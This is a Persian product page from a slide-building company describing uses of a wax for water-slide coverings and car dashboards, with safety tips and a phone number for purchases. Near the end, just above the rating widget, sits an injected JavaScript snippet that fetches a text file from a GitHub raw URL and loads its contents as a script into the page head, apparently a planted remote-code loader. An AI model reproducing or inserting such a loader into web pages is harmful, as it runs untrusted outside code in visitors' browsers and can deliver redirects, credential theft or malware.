کارایی واکس چیست؟
کارایی واکس چیست؟

کارایی واکس چیست؟

 • واکس کارایی زیاد دارد که مورد استفاده شما قرار می گیرد که ما این کارای ها را به شما توضیخ می دهیم.

  کارایی واکس

  کارایی واکس

  واکس سر برای سر شدن و زدخش شدن روکش سر استفاده می شود. زد خش ینی چه؟ اگر روکش سر نباشد باعث می شود که افرادی که از آن استفاده می کنند به راحتی سر نخورند و به صورت که انگار روی سرسره گیر کردنده اند و با زبه های پی در پی به ارامی به پایین می آیند و جای لباس و شلواد افراد روی روکش بصورت خط خط کشید می شود. دستگاه بر اثر این زبه ها آسیب می بیند و اکثر اوقات به دست و پای افراد اسیب می رسد. این مواد را بری شتستوشو هم می توانید استفاده کنید. این مواد قبل از استفاده برای روکش سر با آب مخلوط و آن را رو دستگاه یا روکس اسپری کرده و به یک ابر آن را پخش کنید.

  کارایی واکس

  استفاده این واکس برای ماشین

  این مواد هر جا استفاده کنید آن و سیله حالت نانو می شود و زد جذب گرد خاک می شود این واکس برای ماشین هم میتوانید استفاده کنیید. واکس داشبورد خودروبرای پاک کردن و تمیزی داشبورد خودرو، استفاده از واکس داشبورد بسیار کمک کننده است. به همین دلیل همیشه یک واکس داشبورد را در خودروی خود حمل بکنید تا ماشین شما همیشه تمیز باشد. این مواد از نشستن گرد و خاک و کثیفی های سطحی داشبورد محافظت می کند و مانع از آلودگی داشبورد می شود و در کمترین زمان اگر لکه ای روی سطح داشبورد باشد به سهولت پاک می شود.

  کارایی واکس


  براقی و زیبایی داخل اتومبیل شما بعد از استفاده از واکس خودرو بسیار ارزشمند است. برای گرفتن نتیجه ی بهتر هنگام استفاده از واکس داشبورد، حتما از یک ابر تمیز استفاده بکنید. سعی کنید این مواد را مستقیما به سطح اسپری نکنید. هنگام استفاده از واکس داشبورد مواظب باشید که آن را بر روی شیشه، آینه و کیلومتر شمار اسپری نکنید و فقط داشبورد را هدف قرار بدهید. اگر اشتباها واکس را به صورت یا چشم خود اسپری کردید نترسید و سریعا چشم و صورت خود را با آب شستشو دهید.

  نحوه خرید این واکس

  تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید این مواد ها به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید